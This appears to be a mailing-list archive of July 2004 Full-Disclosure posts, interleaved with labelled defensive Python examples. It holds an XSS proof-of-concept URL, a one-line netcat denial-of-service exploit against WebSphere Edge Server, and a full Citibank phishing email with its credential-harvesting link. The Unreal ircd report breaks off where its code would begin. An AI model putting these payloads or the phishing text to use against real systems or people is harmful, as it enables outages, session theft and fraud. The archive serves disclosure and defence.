the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200407-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
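The bug class in GLSA 200407-03 above is an unbounded accumulation of header continuation lines. The reader below is an added example (not Apache's code) of the defensive limit such a parser needs: each continuation line starting with SPACE or TAB is joined to the preceding field, and the field is rejected as soon as its accumulated size passes a limit, before anything is stored. The limits, the sample header blocks and the function names are constructed for the example; the Apache directives named in the comments are real.

```python
"""Bounded parsing of folded (continuation) HTTP header lines.

Added example, not Apache's code. Continuation lines beginning with SPACE
or TAB (obs-fold) belong to the preceding header field; a reader that
accepts an unlimited number of them lets a client grow one logical field
without bound. This reader checks the accumulated field size on every
line and rejects the request before the field is stored.
"""

# Constructed limits. Apache exposes the equivalent knobs as the
# LimitRequestFieldSize and LimitRequestFields directives.
MAX_FIELD_SIZE = 8190   # bytes for one logical field (name, colon, value)
MAX_FIELDS = 100        # logical fields per request


class HeaderLimitExceeded(ValueError):
    """Raised when a request exceeds a configured header limit (HTTP 431)."""


def parse_headers(raw: bytes, max_field_size: int = MAX_FIELD_SIZE,
                  max_fields: int = MAX_FIELDS) -> list[tuple[str, str]]:
    """Parse a CRLF-delimited header block into (name, value) pairs.

    Continuation lines are joined to the previous field with one space, as
    RFC 7230 section 3.2.4 prescribes for servers that accept obs-fold at
    all (rejecting it with 400 is also permitted). Limits are enforced as
    the field grows, not after the whole block has been read.
    """
    fields: list[list] = []
    current = None                      # [name, value] being accumulated
    for line in raw.split(b"\r\n"):
        if line == b"":
            break                       # blank line ends the header block
        if line[:1] in (b" ", b"\t"):
            if current is None:
                raise ValueError("continuation line before any header field")
            current[1] = (current[1] + b" " + line.strip()).strip()
        else:
            if current is not None:
                fields.append(current)
            if len(fields) >= max_fields:
                raise HeaderLimitExceeded("too many header fields")
            name, sep, value = line.partition(b":")
            if not sep or not name or name != name.strip():
                raise ValueError(f"malformed header line: {line!r}")
            current = [name, value.strip()]
        # One check covers both fresh fields and every continuation line.
        if len(current[0]) + 1 + len(current[1]) > max_field_size:
            raise HeaderLimitExceeded(
                f"field {current[0].decode('ascii', 'replace')} exceeds "
                f"{max_field_size} bytes")
    if current is not None:
        fields.append(current)
    return [(n.decode("ascii"), v.decode("latin-1")) for n, v in fields]


def folded_block(lines: int) -> bytes:
    """Constructed header block whose X-Fold field has `lines` continuations."""
    return (b"Host: www.example.test\r\nX-Fold: a\r\n"
            + b" b\r\n" * lines + b"\r\n")
```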
Re: [Full-Disclosure] Web sites compromised by IIS attack
From: Jason Coombs (jasonc@science.org)
Date: Sun Jul 04 2004 - 16:01:04 CDT
>>frank, this is not a kindergarden list. this not a housewife support
>>list. this is a security list, this a full disclousure list. period.
It also is not a list for the benefit exclusively of people who are
fortunate enough to have simple security problems. The security issues
surrounding the question "how do I keep my home computer safe from
attack?" are trivial compared to those surrounding the question "how do
I keep the 200,000 computing devices worldwide within my organization
from being owned and then attacking each other?"
Anyone with a truly complex security problem knows that it is hopeless
to ever really control many computers in the presence of many people.
You have no choice in a complex situation but to let things happen that
you think are beneficial to you (the vendor installing patches, in this
discussion) and find a way, after the fact, or periodically, to confirm
that the end result was in fact beneficial to you.
Sincerely,
Jason Coombs
jasonc@science.org
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: System Outage (system_outage@yahoo.com)
Date: Sun Jul 04 2004 - 16:40:13 CDT
Gmail service is in Beta. You have no credibility posting this advisory. The correct channel to post such "bugs" is the Gmail contact link for "bug reports".
If you weren't a script kiddie or scene whore, you would have known to hold information until such a time that Gmail became a public service.
Then and only then would anyone take this advisory seriously!
You obviously have no understanding of the "Beta" state of a development. The fact that a team of developers are in the state of "Beta" means that the developers are fully aware the service may not be entirely secure and they wish feedback via Google's own beta "bug report" channels.
All in all, this is a "beta bug report" and nothing else. If you had waited until the Gmail dev team declared gmail a public release, you would have gained more respect in the security community scene.
Cheerio
Re: [Full-Disclosure] Re:Bugtraq Security Systems
From: System Outage (system_outage@yahoo.com)
Date: Sun Jul 04 2004 - 17:04:27 CDT
A name like "Bugtraq Security Systems" sounds like a typical name a script kiddie group or scene whore group would use to try and gain an easy name within the scene.
They (Bugtraq Security Systems) obviously thought... Hey.. "if we whore a high profile name and make our website look professional, people will buy it and think we're elite".
Lol, if you had any cred in the security community scene, you just lost it by mentioning the key words "Defcon" and "Drew Copley is a prick" references.
All you are making yourself out to be is a jealous scene whore who wishes they had the 0-day exclusives that Eyee Security obtain and you wish you were as good as they are.
You have no right to come on a high profile security mailing list with such childish remarks towards a highly respected Security Group as Eyee. Go find some "elite" zero day and come back when you manage to gain as much respect as Eyee Security has within the security community scene.
Cheerio
[Full-Disclosure] Re:Bugtraq Security Systems
From: Boggles (boggles@hush.com)
Date: Sun Jul 04 2004 - 17:37:52 CDT
So Boggles was just settling down to a lunch of pan fried Big Bird and
suddenly all hell broke out.
Unlike normal, there were no emails in Boggles' inbox to aid the decision
making process.
After careful inspection of body hair the following was revealed as the
cause of the problem (rabies/tetanus/wh0ritus shot(s) is/are recommended
in cases of actually reading emails which trigger the alert):
****************************
:BOGGLES IDS SECURITY ALERT:
****************************
Type: High fibre
Pattern Matched:
"On [A-Za-z]+, [0-3][0-9] 20[0-9][0-9], System Outage wrote"
Action Taken: Message Deleted
Suggest fix:
"Boggles Internal Defacation System recommends
that no action be taken, comedy posts such as those
provided by System Outage do the community good on a
4th July afternoon."
Clarification:
"Lol, if you had any cred in the security community scene, you just lost
it by mentioning the key words "Defcon" and "Drew Copley is a prick"
references."
By the same laws (see today's earlier post for a good legal contact)
this means that "if you had any cred in the security community scene,
you just lost it" [before anyone says "But Mr Boggles, that means you
have too", Boggles has no cred (in fact Boggles LIKES SOCKS WITH HIS SANDALS)]
Boggles is going to hunt snuffleupagi for dessert now.
--
Boggles Funniest Quotes:
"I have work to do..."
++ Drew Copley, iDefense
RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"
From: joe (mvp@joeware.net)
Date: Sun Jul 04 2004 - 19:35:11 CDT
The fun thing with you is that irregardless of what I say, it isn't, in your
esteemed opinion, correct.
Why? Because you once took to understand something I said as defending
Microsoft which is against your very narrow viewpoint so automatically I
can't possibly have any valid viewpoint.
So, for instance, when I say outright, that the fact IE was sold to a bunch
of legal people (see my previous comments on legal type people) as core by
MS completely incorrectly in the viewpoint of looking at the OS components
technically you still choose to try to harass. Note I say try. Had that
same thing been said by someone posting with some open source email client
on *nix you would have been applauding assuming you understand 822.
As I mailed to you offlist, any time you are willing to discuss things
intelligently, email me. Posts such as the one below simply hurt your cause,
whatever in the world that might be.
Being Bill Gates would be kind of cool. In those shoes I would sell off
every piece of MS I owned that the government would allow and go buy Tahiti
or Aruba or both and not touch a computer again. Again, remember, computers
aren't about religion, it is a means to an end. Work to live, don't live to
work.
BTW, it is joe, not JOE - I am case sensitive and you hurt my feelings.
joe
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
bills.bitch@hushmail.com
Sent: Saturday, July 03, 2004 4:45 PM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"
ha ha ha ha ha the dog bites his master he he he he
Couple of things
Judge: What is this Internet Explorer thing Gates?
Bill Gates: It's a core component of the operating system ma'am
Judge: BULLSHIT GATES! JOE SAYS IT ISN'T
Judge: YOU'RE GUILTY!
Bill Gates: oh
JUDGE: 6 POSSIBLE SENTENCES, JAIL, FINE, FIX, REPENT, SUSPEND, GO TO JOE
SCHOOL OF REHABILITATION
joe: you see you see, the judge has given him six options, that means he's
not guilty, do you see what I mean. Can you see it can you see it.
By the way did I tell you about my last gig, I made a whack of dough off it
and now I am sitting on the beach in Tahiti sucking back margaritas.
*sigh* I wish I were Bill Gates, he be so cool
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: D.J. Capelis (djcapelisp@yahoo.com)
Date: Sun Jul 04 2004 - 19:41:19 CDT
The notion that this list is only for reporting
bugs in software that isn't in beta is absurd.
If there's a major vulnerability in gaim or
firefox I'd expect to hear about them on this
list. (Both are in beta (firefox is alpha I
think they like to say these days?)) If there is
a large userbase using it that is vulnerable to a
security concern then it should be on this list.
That's what this list is about, making people
aware and sharing new security vulnerabilities.
So stop shouting that (s)he's losing
"credibility" in the "scene." In my eyes he
gained a lot by actually classifying his neat
little hack by saying it's got a really low
severity. (And by finding a small hole in gmail,
there's plenty of people looking and google has
some great coders.) More "respected" security
firms should take a leaf from his/her book and
learn to mark severity of their discoveries
correctly.
(And really? The security "scene?" What is this
to you, a little social tea party?)
~D.J. Capelis~
Security and Cryptography Researcher
--- System Outage <system_outage@yahoo.com> wrote:
> Gmail service is in Beta. You have no
> credibility posting this advisory. The correct
> channel to post such "bugs" is the Gmail
> contact link for "bug reports".
>
> If you weren't a script kiddie or scene whore,
> you would have known to hold information until
> such a time that Gmail became a public service.
>
> Then and only then would anyone take this
> advisory seriously!
>
> You obviously have no understanding of the
> "Beta" state of a development. The fact that a
> team of developers are in the state of "Beta"
> means that the developers are fully aware the
> service may not be entirely secure and they
> wish feedback via Google's own beta "bug
> report" channels.
>
> All in all, this is a "beta bug report" and
> nothing else. If you had waited until the Gmail
> dev team declared gmail a public release, you
> would have gained more respect in the security
> community scene.
>
> Cheerio
>
RE: [Dailydave] Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: Steve W. Manzuik (steve@entrenchtech.com)
Date: Sun Jul 04 2004 - 22:38:49 CDT
Interesting they skipped VulnWatch in this mailing.........
> -----Original Message-----
> From: dailydave-bounces@lists.immunitysec.com
> [mailto:dailydave-bounces@lists.immunitysec.com] On Behalf Of dave
> Sent: Sunday, July 04, 2004 11:19 AM
> To: OIS
> Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; bugtraq@securityfocus.com;
> full-disclosure@lists.netsys.com
> Subject: [Dailydave] Re: [Full-Disclosure] Public Review of
> OIS Security Vulnerability Reporting and Response Guidelines
>
> Nobody trusts the OIS or its motives. I imagine this is
> similar to the feedback you've gotten from everyone else as
> well, but Immunity has no plans to subscribe to your
> guidelines, and is going to oppose any efforts you make to
> legislate those guidelines as law. In section 1.1 the draft
> proposes that the purpose of the OIS's model is to protect
> systems from vulnerabilities. This is fairly obviously untrue
> - the purpose of the OIS is to lobby towards a business model
> for Microsoft and the other OIS members that involves the
> removal of non-compliant security researchers.
>
> This call for feedback is a thinly disguised attempt to get
> public legitimacy and allow the OIS to claim it has community
> backing, which it clearly does not.
>
> It's rare, but there are still security companies and
> individuals who do not owe their entire business to money
> from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of
> independence.
>
> Dave Aitel
> Immunity, Inc.
>
>
>
>
> OIS wrote:
>
> >
> > The Organization for Internet Safety (OIS) extends an invitation to
> > the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> > lists to participate in the ongoing public review of the OIS Security
> > Vulnerability Reporting and Response Guidelines.
> > The OIS reviews the Guidelines annually to ensure that they remain
> > useful and relevant to the security community and, most importantly,
> > to the millions of computer users who are the ultimate beneficiaries
> > of effective computer security practices. Over the past year, OIS has
> > received feedback from many adopters of the Guidelines as well as from
> > several public-private partnerships, and have incorporated much of
> > this feedback into an interim version that is available at
> > http://www.oisafety.org/review/draft-1.5.pdf. We recommend reviewing
> > the interim version, but reviewers are welcome to provide feedback on
> > the original version at http://www.oisafety.org/reference/process.pdf
> > if they would like.
> >
> > For more information on the public review, please visit
> > http://www.oisafety.org/review-1.5.html. The closing date for the
> > review has been extended until 16 July 2004. We look forward to your
> > feedback.
> >
> > Regards,
> >
> > The Organization for Internet Safety
> > www.oisafety.org
> >
> >
>
>
>
> _______________________________________________
> Dailydave mailing list
> Dailydave@lists.immunitysec.com
> http://www.immunitysec.com/mailman/listinfo/dailydave
>
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: amforward@mailsurf.com
Date: Mon Jul 05 2004 - 01:37:27 CDT
System Outage wrote:
|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".
I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.
|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.
I don't think this is about respect after all.
Regards,
Ahmed Motaz
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Rudolf Polzer (divzero@gmail.com)
Date: Mon Jul 05 2004 - 01:27:34 CDT
> Gmail service is in Beta. You have no credibility posting this advisory. The correct channel to post such "bugs" is the Gmail contact link for "bug reports".
> If you weren't a script kiddie or scene whore, you would have known to hold information until such a time that Gmail became a public service.
Then he'd probably be regarded as a kiddie too... unless he has
reported the bug before. Keeping bugs secret and waiting until many
people use a product, then releasing the advisory, is in two senses
counterproductive:
a) if you had disclosed the information to the author (here: Google)
before, the bug would most probably have been fixed
b) more people are affected by waiting
Posting it here while gmail is in beta stage is not SO bad - but one
should also report it to gmail themselves.
[Full-Disclosure] XSS in 12Planet Chat Server 2.9
From: Donato Ferrante (fdonato@autistici.org)
Date: Mon Jul 05 2004 - 02:56:21 CDT
Donato Ferrante
Application: 12Planet Chat Server
http://www.12planet.com
Version: 2.9
Bug: cross site scripting
Date: 05-Jul-2004
Author: Donato Ferrante
e-mail: fdonato@autistici.org
web: www.autistici.org/fdonato
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1. Description
2. The bug
3. The code
4. The fix
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
----------------
1. Description:
----------------
Vendor's Description:
"The #1 Professional Chat Server Software, bringing instant
communication into web sites, intranet and extranet portals:
setup your community chat rooms, organize celebrity chat events,
collaborative work sessions or online meetings."
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
2. The bug:
------------
Input strings in some fields are not filtered by the server, so they
appear in the returned page.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-------------
3. The code:
-------------
To test the vulnerability:
http://[host]:8080/servlet/one2planet.infolet.InfoServlet?
page=<script>alert("hy")</script>
( all on the same line )
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
4. The fix:
------------
No fix.
The vendor has not answered my reports.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
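The advisory above reports the `page` parameter being echoed unfiltered and gives no fix. Below is an added example (not 12Planet's code, which is a Java servlet; this is a Python stand-in) showing that behaviour beside the fix, which is encoding for the output context at the point where the value is written. The hostname `chat.example` replaces the advisory's `[host]` placeholder and the function names are constructed.

```python
"""Output encoding for the reflected `page` parameter.

Added example, not 12Planet's code: a Python stand-in for the Java servlet
named in the advisory, showing the behaviour described there (the
parameter is copied into the page unfiltered) next to the fix.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

SERVLET_PATH = "/servlet/one2planet.infolet.InfoServlet"   # from the advisory
# The advisory's test URL with its [host] placeholder replaced by a
# constructed hostname so that urlsplit() accepts it.
ADVISORY_URL = f"http://chat.example:8080{SERVLET_PATH}?page=<script>alert(\"hy\")</script>"


def page_parameter(url: str) -> str:
    """Return the `page` query parameter as the servlet receives it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("page", [""])[0]


def render_unsafe(page: str) -> str:
    """The behaviour the advisory describes: the value is copied into the
    response body verbatim, so any markup in it is parsed by the browser."""
    return f'<html><body><div id="content">{page}</div></body></html>'


def render_safe(page: str) -> str:
    """Fix for element content: escape <, >, &, " and ' so the browser
    renders the value as text instead of parsing it as markup."""
    return f'<html><body><div id="content">{escape(page, quote=True)}</div></body></html>'


def render_safe_link(page: str) -> str:
    """Fix when the value is reused inside a URL in an attribute: percent-
    encode for the URL context first, then HTML-escape for the attribute."""
    href = f"{SERVLET_PATH}?page={quote(page, safe='')}"
    return f'<a href="{escape(href, quote=True)}">{escape(page, quote=True)}</a>'


def echoes_markup(rendered: str, payload: str) -> bool:
    """True when the payload reaches the response unchanged, i.e. the page
    still reflects input as markup (what the advisory's test URL checks)."""
    return payload in rendered
```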
Re: [Full-Disclosure] HP urges users to erase Netscape to avoid security problems
From: Szilveszter Adam (adam@nhh.hu)
Date: Mon Jul 05 2004 - 03:29:21 CDT
Barry Fitzgerald wrote:
> Heh.
>
> The article has the following quote:
>
> "On other platforms, such as Linux, Unix and the Mac, Explorer is less
> of a threat."
>
> Uhh... yeah, you could say that it's less of a threat on GNU/Linux and
> Unix... non-existence will do that.
Ummm, perhaps people have a short attention span, but IE used to exist
for Solaris and HP-UX at one time. (It was in the 4.x version) But I
doubt it has been maintained since. (Heck, I even have a Unix binary of
the then NetShow player, which has later mutated into Windows Media
Player the hog, replacing the small and dull video player from win95
days... it plays older .asf streams/files all right.)
And yes, from the article it really looks to me that HP was talking
about the long-discontinued 4.x (pre-Mozilla) version of Netscape, which
used to be available for many platforms and has seen steady use even
after 6.x came out, because
1) it was a lot smaller and faster esp in the beginning (remember, at
the time Mozilla leaked memory like a sieve, and was so slow that you
easily could go for a coffee break, this is what allowed eg Opera to
jump into the fray and strike it big)
2) it had an integrated Java Virtual Machine (albeit a fairly antiquated
one) which helped platforms where a plugin was not available
3) it had the familiar look-and-feel whereas the new Mozilla look really
took some adjustment
4) it was included on just about any installation CD etc., just like older
versions of Acrobat Reader were, to access HTML docs.
And yes, *that* browser is full of bugs by now... even though for a
while, Netscape/AOL used to put out minor bugfix releases in silence,
exactly because they knew it was used by many...
Regards,
Sz.
[Full-Disclosure] Huge amounts of Citibank phishing spam seen this weekend.
From: Feher Tamas (etomcat@freemail.hu)
Date: Mon Jul 05 2004 - 06:15:30 CDT
Return-Path: <safe@citibank.com>
Delivered-To: xy@z.com
Received: (qmail 26637 invoked by alias); 5 Jul 2004 10:22:42 -0000
Delivered-To: xy@z.com
Received: (qmail 26625 invoked from network); 5 Jul 2004 10:22:42 -0000
Received: from unknown (HELO xxxxx) (192.168.xxx.xxx)
by xxxxx.xxxxx.com with SMTP; 5 Jul 2004 10:22:42 -0000
Received: from [192.168.xxx.xxx]:3815 (EHLO xxxxxxx)
by xxxxxx ([192.168.xxx.xxx]:25) (censored) with SMTP; Mon,
5 Jul 2004 10:22:39 -0000
Received: from avenirdev.net2.nerim.net
(avenirdev.net2.nerim.net [213.41.129.36]) by xxxxxxxx
(8.12.9/8.12.9) with SMTP id i65AMbvX009990;
Mon, 5 Jul 2004 12:22:38 +0200
X-Message-Info: EUZieVCD797cazJifePDLup79PXxd1+Jmeve090esDKB
Received: from bvoadkrq795.yahoo.com ([183.192.129.62]) by
cv840-ena634.yahoo.com with Microsoft SMTPSVC(5.0.2195.6824);
Mon, 05 Jul 2004 14:02:44 +0300
Received: from Byronz447z00uvb7j ([192.91.180.33]) by
mxbj13.yahoo.com (InterMail vM.5.01.06.05
105-294-922-056-415-584970568) with SMTP id
<5635443945.NANBL433.zsvlyce336.yahoo.com@bootleggedve0rum66afa40fp>
for <xy@z.com>; Mon, 05 Jul 2004 06:04:44 -0500
Message-ID: <179zi495neg7525$29816$x937hcd073@Byronsmb495qc15mza67qrv>
From: "Support" <safe@citibank.com>
To: <xy@z.com>
Subject: Urgent Update: CitiSafe by Citibank
Date: Mon, 05 Jul 2004 17:02:44 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--60788191235995120027"
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on xxxxx
X-Spam-Level: **
X-Spam-Status: No, hits=2.0 required=4.5
tests=BAYES_40,HTML_MESSAGE,
HTML_TITLE_UNTITLED,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
NORMAL_HTTP_TO_IP autolearn=no version=2.63
----60788191235995120027
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<b>Dear Citibank Customer</b>,
<p> We recently noticed one or more attempts to log in to your Citibank<br>
account from a foreign IP address and we have reasons to believe that<br>
there was attempts to compromise it with brute forcing your PIN number.<br>
No successful login was detected and you have full protection by now. <br>
If you recently accessed your account while travelling, the unusual login<br>
attempts may have been initiated by you.</p>
<p><i>The login attempt was made from:<br>
IP address: 173.97.087.24<br>
ISP Host: cache-89.proxyserver.cis.com</i></p>
<p> By now, we used many techniques to verify the accuracy of the<br>
information our users provide us when they register on the Site.<br>
However, because user verification on the Internet is difficult, Citibank<br>
cannot and does not confirm each user's purported identity. Thus, we<br>
have established an offline verification system to help you evaluate with<br>
whom you are dealing with. The system is called CitiSafe and it's<br>
the most secure Citibank wallet so far.</p>
<p> If you are the rightful holder of the account, click the link bellow, fill<br>
the form and then submit as we will verify your identity and register you<br>
to CitiSafe free of charge. This way you are fully protected from fraudulent<br>
activity on all the accounts that you have with us.</p>
<p> <u><b><a href="http://219.148.127.66/scripts/confirmation.htm">Click to protect
yourself from fraudulent activity!</a></b></u></p>
<p> To make Citibank.com the most secure site, every user will be <br>
registered to CitiSafe.</p>
<p> <u>NOTE! If you choose to ignore our request, you leave us no choice but to<br>
temporally suspend your account.</u></p>
<p> * <u>Please do not respond to this e-mail, as your reply will not be received.</u></p>
<p>Regards, <b>Citibank Customer Support</b><br>
</p>
</body>
</html>
----60788191235995120027--
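The check behind the NORMAL_HTTP_TO_IP hit in the X-Spam-Status header above, applied to the HTML body, as an added example that is not part of the forwarded message: it lists anchors whose href host is a bare IP address and flags a body that names a brand while its call-to-action link goes to a numeric host. SAMPLE_BODY is a constructed, shortened stand-in using a documentation-range IP, not the address in the original mail.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlsplit


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = [dict(attrs).get("href") or "", ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            href, text = self._current
            # collapse the soft line breaks of the mail body into single spaces
            self.anchors.append((href, " ".join(text.split())))
            self._current = None


def host_is_ip_literal(url):
    """True when the URL's host is a bare IPv4 or IPv6 address."""
    try:
        host = urlsplit(url).hostname
    except ValueError:          # e.g. an unbalanced IPv6 bracket
        return False
    if not host:                # mailto:, relative links, etc.
        return False
    try:
        ip_address(host)
    except ValueError:
        return False
    return True


def find_ip_links(html):
    """All anchors whose href points at a numeric host."""
    parser = _AnchorCollector()
    parser.feed(html)
    parser.close()
    return [(href, text) for href, text in parser.anchors if host_is_ip_literal(href)]


def looks_like_brand_phish(html, brand):
    """The combination seen in the forwarded mail: the body names a brand, but
    the link it asks the reader to click goes to a numeric host."""
    return brand.lower() in html.lower() and bool(find_ip_links(html))


# Constructed stand-in for the forwarded body (documentation-range IP,
# not the address in the original message).
SAMPLE_BODY = """<html><body>
<b>Dear Citibank Customer</b>,
<p>If you are the rightful holder of the account, click the link below.</p>
<p><u><b><a href="http://192.0.2.10/scripts/confirmation.htm">Click to protect
yourself from fraudulent activity!</a></b></u></p>
<p>Regards, <b>Citibank Customer Support</b></p>
</body></html>"""

if __name__ == "__main__":
    for href, text in find_ip_links(SAMPLE_BODY):
        print(f"numeric-host link: {href!r} shown as {text!r}")
    print("brand/link mismatch:", looks_like_brand_phish(SAMPLE_BODY, "Citibank"))
```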
[Full-Disclosure] Re: [FD] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
From: Thomas Binder (full-disclosure@arago.de)
Date: Mon Jul 05 2004 - 07:30:05 CDT
Hi!
On Sat, Jul 03, 2004 at 06:18:59PM +0200, Rudolf Polzer wrote:
> IMHO it will be nice if one could override some php.ini settings
> on a per-script basis.
When using PHP as an Apache module, you can achieve something like
that in httpd.conf:
<Location /path/to/broken/script.php>
php_admin_flag register_globals on
</Location>
<Location /path/to/sane/script.php>
php_admin_flag register_globals off
</Location>
Ciao
Thomas
[Full-Disclosure] CYBSEC - Security Advisory: Denial of Service in IBM WebSphere Edge Server
From: Leandro Meiners (lmeiners@cybsec.com)
Date: Mon Jul 05 2004 - 07:25:23 CDT
The following advisory is also available in pdf for download at
http://www.cybsec.com/vuln/IBM-WebSphere-Edge-Server-DOS.pdf
CYBSEC S.A.
www.cybsec.com
Advisory Name: Denial of Service in WebSphere Edge Server.
Vulnerability Class: Denial of Service
Release Date: June 2nd 2004
Affected Applications:
* WebSphere Edge Components Caching Proxy 5.02 using
JunctionRewrite with UseCookie directive.
Not Affected Applications:
* WebSphere Edge Components Caching Proxy 5.02 NOT using
JunctionRewrite with UseCookie directive.
* WebSphere Edge Components Caching Proxy 5.00
Affected Platforms:
* SUSE SLES 8
* SUSE SLES 8 Service Pack 1
* SUSE SLES 8 Service Pack 3
* SUSE SLES 8 Service Pack 3
* Apparently all platforms running WebSphere Edge Server
Local / Remote: Remote
Severity: High
Author: Leandro Meiners.
Vendor Status:
* Fix included in WebSphere Application Server 5.0.3 (to be
released)
* Patch available from IBM for clients with Support Level 2 or 3
Reference to Vulnerability Disclosure Policy:
http://www.cybsec.com/vulnerability_policy.pdf
Overview:
WebSphere Edge Component Caching Proxy, part of WebSphere Application
Server, is a reverse proxy designed to reduce bandwidth use and improve a
Web site's speed and reliability by providing a point-of-presence node
for one or more back-end content servers. It is built to work with
content provided by one or more backend WebSphere Application Servers.
Vulnerability Description:
The vulnerability discovered allows a remote attacker to generate a
denial of service condition against the WebSphere Edge Component Caching
Proxy.
If the reverse proxy is configured with the JunctionRewrite directive
being active, a remote attacker can trivially cause a denial of service
by executing the GET HTTP method without parameters.
Exploit:
$ echo "GET" | nc <victim_host_ip> <proxy_port>
Solutions:
If JunctionRewrite is unnecessary, disabling it will suffice to prevent
the Denial of Service. Also if the option UseCookie in the
JunctionRewrite directive is unnecessary disabling it will suffice to
prevent the Denial of Service.
Vendor Response:
IBM opened a case regarding the vulnerability and provided a patch
within 2 weeks of the initial contact.
Contact Information:
For more information regarding the vulnerability feel free to contact
the author at lmeiners@cybsec.com.
For more information regarding CYBSEC: www.cybsec.com
----------------------------
Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: lmeiners@cybsec.com
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com
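A defender-side check for the request shape the advisory describes, added here as an example and not part of the CYBSEC advisory: it scans proxy access-log lines for a bare method with no request-target, which is what the exploit above sends. It assumes the proxy logs in Common Log Format and runs over constructed sample lines.

```python
import re

# Common Log Format: client ident user [time] "request" status size.
# That the Caching Proxy writes this layout is an assumption of this example.
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}|-) (\d+|-)')

# A complete request line: method, request-target, optional HTTP/x.y
# (HTTP/0.9 simple requests carry no version, so the version is optional).
REQUEST_LINE = re.compile(r'^[A-Za-z]+[ \t]+\S+(?:[ \t]+HTTP/\d\.\d)?$')


def classify_request(request):
    """Return 'ok', 'bare-method' (a method token with nothing after it, the
    case in the advisory) or 'malformed' for the request field of a log line."""
    request = request.strip()
    if REQUEST_LINE.match(request):
        return "ok"
    if re.fullmatch(r"[A-Za-z]+", request):
        return "bare-method"
    return "malformed"


def find_bare_method_requests(log_lines):
    """Return (client, timestamp, request) for every bare-method request."""
    hits = []
    for line in log_lines:
        m = CLF.match(line)
        if not m:
            continue            # not a CLF line; skip rather than guess
        client, when, request, _status, _size = m.groups()
        if classify_request(request) == "bare-method":
            hits.append((client, when, request))
    return hits


# Constructed sample log lines, not taken from any real proxy.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jul/2004:12:22:38 +0200] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [05/Jul/2004:12:23:01 +0200] "GET" 400 0',
    '198.51.100.7 - - [05/Jul/2004:12:23:05 +0200] "GET /app/login HTTP/1.0" 302 0',
    '203.0.113.5 - - [05/Jul/2004:12:23:09 +0200] "GET" - -',
    '192.0.2.44 - - [05/Jul/2004:12:23:20 +0200] "POST /app/search HTTP/1.1" 200 812',
    '192.0.2.44 - - [05/Jul/2004:12:23:21 +0200] "" 400 0',
]

if __name__ == "__main__":
    for client, when, request in find_bare_method_requests(SAMPLE_LOG):
        print(f"{when} {client} sent bare request line {request!r}")
```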
[Full-Disclosure] Unreal ircd 3.2 clocking subsystem vulnerability
From: bartavelle (bartavelle-anti-spam-thingie@banquise.net)
Date: Mon Jul 05 2004 - 07:23:55 CDT
Software name: Unreal ircd
Vulnerable versions: 3.2 and probably previous versions
Problem nature: Information disclosure
Summary:
Unreal ircd is a popular irc server. One of the features it provides is
called 'ip cloaking'. The purpose of this system is to prevent hostile
irc users from getting the IP address of other users.
In order to prevent ip bruteforcing, it uses three 'keys'. However, the
hashing system is weak.
It is possible to recover the keys of several irc networks by knowing
only one clear text and hashed IP, and another hashed IP.
Details:
The IPv4 hashing scheme is the most vulnerable. Code from cloak.c
follows:
====
